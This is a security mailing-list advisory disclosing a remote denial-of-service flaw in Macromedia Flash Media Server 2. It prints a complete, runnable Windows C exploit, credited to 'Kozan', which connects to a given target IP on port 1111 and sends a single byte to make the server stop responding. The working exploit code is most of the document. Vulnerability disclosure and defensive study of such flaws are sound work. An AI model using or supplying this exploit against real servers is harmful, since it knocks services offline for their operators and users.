[EXPL] Macromedia Flash Media Server DoS (Exploit, Single Character)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Macromedia Flash Media Server DoS (Exploit, Single Character)
------------------------------------------------------------------------


SUMMARY

" <http://www.macromedia.com/software/flashmediaserver/> Macromedia Flash
Media Server 2 software offers the unique combination of traditional
streaming media capabilities and a flexible development environment for
creating and delivering innovative, interactive media applications to the
broadest possible audience."

A vulnerability in Macromedia Flash Media Server allows remote attackers
to cause the server to no longer respond to legitimate requests.

DETAILS

Vulnerable Systems:
* Macromedia Flash Media Server 2

Exploit:
/*********************************

Macromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan

Application: Macromedia Flash Media Server
http://www.macromedia.com/software/flashmediaserver/
Vendor: Macromedia

Discovered by: dr_insane
Exploit Coded by: Kozan
Credits to ATmaCA, dr_insane
Web: www.spyinstructors.com
Mail: kozan@xxxxxxxxxxxxxxxxxx

*********************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

int nDefaultPort = 1111;

char SingleDoSChar[] = "\x41";

int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMacromedia Flash Media Server 2 Remote D.o.S
Exploit by Kozan\n");
fprintf(stdout, "Bug Discovered by: dr_insane\n");
fprintf(stdout, "Exploit Coded by: Kozan\n");
fprintf(stdout, "Credits to ATmaCA, dr_insane\n");
fprintf(stdout, "www.spyinstructors.com -
kozan@xxxxxxxxxxxxxxxxxx\n\n");

if(argc<2)
{
fprintf(stderr, "Usage: %s [Target IP]\n\n", argv[0]);
return -1;
}
WSADATA wsaData;
SOCKET sock;

if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}

sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}

struct sockaddr_in addr;

addr.sin_family = AF_INET;
addr.sin_port = htons(nDefaultPort);
addr.sin_addr.s_addr = inet_addr(argv[1]);
memset(&(addr.sin_zero), '\0', 8);

fprintf(stdout, "Please wait while connecting to server...\n");

if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr)
) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Please wait while sending single DoS char...\n");

if( send(sock,SingleDoSChar,lstrlen(SingleDoSChar),0) == -1 )
{
fprintf(stderr, "DoS char could not sent!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();

return 0;
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:kozan@xxxxxxxxxxxxxxxxxx>
Kozan.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages